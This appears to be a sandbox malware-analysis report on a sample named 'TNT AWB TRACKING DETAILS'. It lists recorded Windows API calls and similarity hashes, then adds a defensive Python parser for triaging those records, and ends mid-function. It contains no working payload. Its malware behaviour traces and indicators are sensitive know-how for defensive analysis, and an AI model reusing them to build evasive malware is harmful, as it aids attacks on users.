                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 3ebea84b8b3ae4c9f1ef991ca7806e62820169a15324069ba1657676d232b001
                                                    • Instruction ID: b9b31e32752d8785fa4c3b369a1904865fe1dd12a8232a9232abf99d9adecf6a
                                                    • Opcode Fuzzy Hash: 3ebea84b8b3ae4c9f1ef991ca7806e62820169a15324069ba1657676d232b001
                                                    • Instruction Fuzzy Hash: 00018FF690021CBFE710D7A0DD89EE7776CDB08300F4001A1BB09E2012EA719E896B71
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F4D47C
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F4D49C
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F4D6D7
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F4D6F5
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F4D716
                                                    • ShowWindow.USER32(00000003,00000000), ref: 00F4D735
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4D75A
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F4D77D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: b4c2f22bfd58c8c9fda374e4f592e97cd11d37b5031afb54cafa01f5b4214204
                                                    • Instruction ID: d3147216547d4d003a30bf64ce3585beaf58639369f3acf1657214f63c985e0b
                                                    • Opcode Fuzzy Hash: b4c2f22bfd58c8c9fda374e4f592e97cd11d37b5031afb54cafa01f5b4214204
                                                    • Instruction Fuzzy Hash: 52B18B75A00229EFDF14CF68C9C57AD7BB1FF04721F098069EC489B295DB34A954EB90
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EC2ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00EC2B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EFC21A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EFC286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 80ada54b8fa536a9e4da3c4542e31c706d20f76f5f145f0d56974487003338e3
                                                    • Instruction ID: d3285f25dc8cd4aa2a55a39cbf3db70f422576006b981ca69afd705b4d995be7
                                                    • Opcode Fuzzy Hash: 80ada54b8fa536a9e4da3c4542e31c706d20f76f5f145f0d56974487003338e3
                                                    • Instruction Fuzzy Hash: E8412B306046889BDB399B288F88FBB7B91AB55304F34A81DE747765B0C6779847E710
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F270DD
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F27114
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F27130
                                                    • _memmove.LIBCMT ref: 00F2717E
                                                    • _memmove.LIBCMT ref: 00F2719B
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F271AA
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F271BF
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F271DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: a403687547eb5a20dbf2fd206f094ed84a7ac3a163ee5d2d9267b23a983e9975
                                                    • Instruction ID: 8bc5fde28dc839c90fb61422a1bd940136d8437d9a651a6e14c404047c27ad9c
                                                    • Opcode Fuzzy Hash: a403687547eb5a20dbf2fd206f094ed84a7ac3a163ee5d2d9267b23a983e9975
                                                    • Instruction Fuzzy Hash: D4318B35900209EBCF00EFA5DC85AABB7B8EF45310F1440B5FD08AB256DBB09E54DBA0
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00F461EB
                                                    • GetDC.USER32(00000000), ref: 00F461F3
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F461FE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F4620A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F46246
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F46257
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F4902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F46291
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F462B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 63f0a1549a6df28a8adb4fd04f4a3e7b639488578f3b97566ee954a1916d7b7f
                                                    • Instruction ID: 29bc7c12d6ca3aecbad2ddfeda29ac3a7b30f5847bc7cbac44d37c390be887ad
                                                    • Opcode Fuzzy Hash: 63f0a1549a6df28a8adb4fd04f4a3e7b639488578f3b97566ee954a1916d7b7f
                                                    • Instruction Fuzzy Hash: 1C318976201214BFEF118F10CC8AFEB3FA9EF5A765F050065FE08DA292C6B59845DB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 39a667434fce3f248c721d23fd3f9566c6afe6c3f9b660ba9f90ded2e772a64c
                                                    • Instruction ID: 0d5a0d6aef5a938f537c01f59bc5ed67cd43d647d1f698bacc860e18c0fc1582
                                                    • Opcode Fuzzy Hash: 39a667434fce3f248c721d23fd3f9566c6afe6c3f9b660ba9f90ded2e772a64c
                                                    • Instruction Fuzzy Hash: 4021D772A0520EBBE208A6129D52FFB739D9E51368F044014FE04A6783EB24DE95A1E2
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • _wcstok.LIBCMT ref: 00F2EC94
                                                    • _wcscpy.LIBCMT ref: 00F2ED23
                                                    • _memset.LIBCMT ref: 00F2ED56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 449fe34a2efc327c3c7529955c047d01029d51e20b82ed9795541f077447e7e6
                                                    • Instruction ID: d049b60ad6332e0e99d800078120feb95bdc30904a9a71495bde81f6d0a4b30b
                                                    • Opcode Fuzzy Hash: 449fe34a2efc327c3c7529955c047d01029d51e20b82ed9795541f077447e7e6
                                                    • Instruction Fuzzy Hash: C0C1AD715083519FC714EF24D985E6AB7E4FF85320F10492DF899AB2A2DB31EC46DB82
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F36C00
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F36C21
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36C34
                                                    • htons.WSOCK32(?), ref: 00F36CEA
                                                    • inet_ntoa.WSOCK32(?), ref: 00F36CA7
                                                      • Part of subcall function 00F1A7E9: _strlen.LIBCMT ref: 00F1A7F3
                                                      • Part of subcall function 00F1A7E9: _memmove.LIBCMT ref: 00F1A815
                                                    • _strlen.LIBCMT ref: 00F36D44
                                                    • _memmove.LIBCMT ref: 00F36DAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    • Opcode ID: 10ac0ef02e89b25600112cf62b13672f7ffcd147f42516b41bad8aabc839cf41
                                                    • Instruction ID: 3ec5453af9312eeb46751d745d0a40e479421415f56444cf0eec53013bd9585a
                                                    • Opcode Fuzzy Hash: 10ac0ef02e89b25600112cf62b13672f7ffcd147f42516b41bad8aabc839cf41
                                                    • Instruction Fuzzy Hash: C081D172604300BBC710EB24CD86F6BB7E8AF84724F10891CF955EB292DA71ED45DB52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9490784fdc123d42c80e27955cee702072eb9816c57b2e4d12eb696b3882497f
                                                    • Instruction ID: 3b9a0ad755d384cf2811be2cfe2f1db070e20b3d8f1129ac3e0b72c4f190bea4
                                                    • Opcode Fuzzy Hash: 9490784fdc123d42c80e27955cee702072eb9816c57b2e4d12eb696b3882497f
                                                    • Instruction Fuzzy Hash: 41718E34900119EFCB04DF98CD44EBEBB79FF86314F108199F915BA252C735AA52CB60
                                                    APIs
                                                    • IsWindow.USER32(01855758), ref: 00F4B3EB
                                                    • IsWindowEnabled.USER32(01855758), ref: 00F4B3F7
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F4B4DB
                                                    • SendMessageW.USER32(01855758,000000B0,?,?), ref: 00F4B512
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00F4B54F
                                                    • GetWindowLongW.USER32(01855758,000000EC), ref: 00F4B571
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F4B589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 2ef30781f8e18397a1bdc950e8ed48b285cd7cab650dc421c81cd2574595f4a4
                                                    • Instruction ID: cbb13ead46e869f3e386cd82768d8ef1e4c34ca3f9ede735920c24b9669d8608
                                                    • Opcode Fuzzy Hash: 2ef30781f8e18397a1bdc950e8ed48b285cd7cab650dc421c81cd2574595f4a4
                                                    • Instruction Fuzzy Hash: 9B718C34A04208AFDB24DF95C894FBABFB9EF1A320F144059ED45972A3C736E951EB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3F448
                                                    • _memset.LIBCMT ref: 00F3F511
                                                    • ShellExecuteExW.SHELL32(?), ref: 00F3F556
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                    • GetProcessId.KERNEL32(00000000), ref: 00F3F5CD
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F3F5FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 25e7cb52d704a8fa67d8b833f440fda85fac54cfc761322bb71e143bfa62ff39
                                                    • Instruction ID: 740c5c883e170b986083df09e1f840f5bbf14b506329c1046d96fcb06c5562f4
                                                    • Opcode Fuzzy Hash: 25e7cb52d704a8fa67d8b833f440fda85fac54cfc761322bb71e143bfa62ff39
                                                    • Instruction Fuzzy Hash: 42618A75E006199FCB04DFA4C985AAEBBF5FF49320F148069E85ABB351CB31AD45CB90
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00F20F8C
                                                    • GetKeyboardState.USER32(?), ref: 00F20FA1
                                                    • SetKeyboardState.USER32(?), ref: 00F21002
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F21030
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F2104F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F21095
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F210B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 24f8fc3e58e8b4d8e78c8db27be5a0a4f4e05ed9036086679d4f9bd139b2470a
                                                    • Instruction ID: d1b217d36f07f5166150c591d706c5c7ae8dba8445235a30a15e8ddd94d02430
                                                    • Opcode Fuzzy Hash: 24f8fc3e58e8b4d8e78c8db27be5a0a4f4e05ed9036086679d4f9bd139b2470a
                                                    • Instruction Fuzzy Hash: D6513660A447E53DFB368234DC05BB6BEA9AB16310F088589F1D4458D3C6E8ECD8F765
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00F20DA5
                                                    • GetKeyboardState.USER32(?), ref: 00F20DBA
                                                    • SetKeyboardState.USER32(?), ref: 00F20E1B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F20E47
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F20E64
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F20EA8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F20EC9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 673251b25d04e8eca07c3da9f7f0994f9792e79597fd3ec664d697ef06cd0296
                                                    • Instruction ID: 481b10fafabcf99f5c6b04066fce91515f4325d6b93baff8d318eafbdcbd1bc3
                                                    • Opcode Fuzzy Hash: 673251b25d04e8eca07c3da9f7f0994f9792e79597fd3ec664d697ef06cd0296
                                                    • Instruction Fuzzy Hash: 145119A29457E57DFB3243749C45B7A7F99AB06310F084889F1D44A4C3DB95ACC8F750
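The two keyboard-state functions above (GetKeyboardState / SetKeyboardState followed by PostMessageW of WM_KEYDOWN or WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN) and the WSOCK32 function earlier in this listing are the kind of records an analyst pivots on: the report gives every message, virtual-key and ordinal argument as raw hex, and the fuzzy hashes are only useful once the records are machine-readable. The parser below is an added example written for this page, not Joe Sandbox's own code. It takes the report's record format as shown on this page (an `APIs` bullet list, a `Memory Dump Source` block and a `Similarity` block that closes with `Instruction Fuzzy Hash`), names the Windows SDK constants that actually occur in this listing, resolves the `#17` call in the WSOCK32 function to its by-ordinal export, and flags functions whose shape is modifier-key synthesis so their `API String ID` and instruction fuzzy hash can be carried into a similarity search. The records embedded in `SAMPLE` are copied from this report; the constant tables are standard Windows SDK values and the ordinal map covers the by-ordinal WSOCK32 exports a triager meets most often. One caveat worth keeping in mind when pivoting: functions of this shape (modifier release before a synthetic key press, UDP receive, ShellExecuteExW, SHFileOperationW with `\*.*`) are consistent with the runtime of a compiled AutoIt script, which the signature section of this report already flags, so matches on these hashes are likely to identify the interpreter stub rather than the FormBook payload it stages.

```python
"""Structured triage of Joe Sandbox 'Execution Graph' function records.

Added example for this report page, not Joe Sandbox's own code. The records
in SAMPLE are copied from the report text (a keyboard-state function and a
WSOCK32 receive function); the constant tables are standard Windows SDK
values, and WSOCK32_ORDINALS covers the by-ordinal exports seen most often.
"""
import re
from typing import Dict, List

# Constructed input: two records copied from this report. The repeated
# "Associated: ...sdmp" lines carry no per-function data and are left out.
SAMPLE = """\
APIs
• GetParent.USER32(00000000), ref: 00F20DA5
• GetKeyboardState.USER32(?), ref: 00F20DBA
• SetKeyboardState.USER32(?), ref: 00F20E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F20E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F20E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F20EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F20EC9
Memory Dump Source
• Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Instruction Fuzzy Hash: 145119A29457E57DFB3243749C45B7A7F99AB06310F084889F1D44A4C3DB95ACC8F750
APIs
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F36C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F36C21
• WSAGetLastError.WSOCK32(00000000), ref: 00F36C34
  • Part of subcall function 00F1A7E9: _strlen.LIBCMT ref: 00F1A7F3
• _memmove.LIBCMT ref: 00F36DAD
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• API String ID: 3619996494-0
• Instruction Fuzzy Hash: C081D172604300BBC710EB24CD86F6BB7E8AF84724F10891CF955EB292DA71ED45DB52
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR", plus the indented "Part of subcall" variant
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Windows SDK constants for the hex arguments this report leaves undecoded
WM = {0x30: "WM_SETFONT", 0xA1: "WM_NCLBUTTONDOWN", 0xB0: "EM_GETSEL",
      0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x142: "CB_SETEDITSEL"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
# WSOCK32.dll exports its socket API by ordinal; the report prints "#N"
WSOCK32_ORDINALS = {16: "recv", 17: "recvfrom", 19: "send", 20: "sendto", 23: "socket"}


def hexval(token: str):
    """Hex argument -> int, or None for the report's '?' placeholder."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_records(text: str) -> List[Dict]:
    """Split report text into records; a record closes at Instruction Fuzzy Hash."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        cur = cur or {"apis": [], "fields": {}}
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur["apis"].append({"name": m["name"], "module": m["mod"], "ref": m["ref"],
                                    "subcall": m["sub"],
                                    "args": m["args"].split(",") if m["args"] else []})
        elif (m := FIELD_RE.match(line)):
            cur["fields"][m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = None
    if cur:
        records.append(cur)
    return records


def decode_call(call: Dict) -> str:
    """Render one call with known message, key and ordinal constants named."""
    name, args = call["name"], list(call["args"])
    if call["module"] == "WSOCK32" and name.startswith("#"):
        ordinal = int(name[1:])
        name = f"{WSOCK32_ORDINALS.get(ordinal, name)} (ordinal {ordinal})"
    if name in ("PostMessageW", "SendMessageW") and len(args) >= 3:
        msg = hexval(args[1])
        if msg in WM:
            args[1] = WM[msg]
            if msg in (0x100, 0x101) and hexval(args[2]) in VK:
                args[2] = VK[hexval(args[2])]
    return f"{name}.{call['module']}({','.join(args)}) @ {call['ref']}"


def synthesizes_modifier_keys(rec: Dict) -> bool:
    """Keyboard state read+written and WM_KEYDOWN/WM_KEYUP posted for a modifier:
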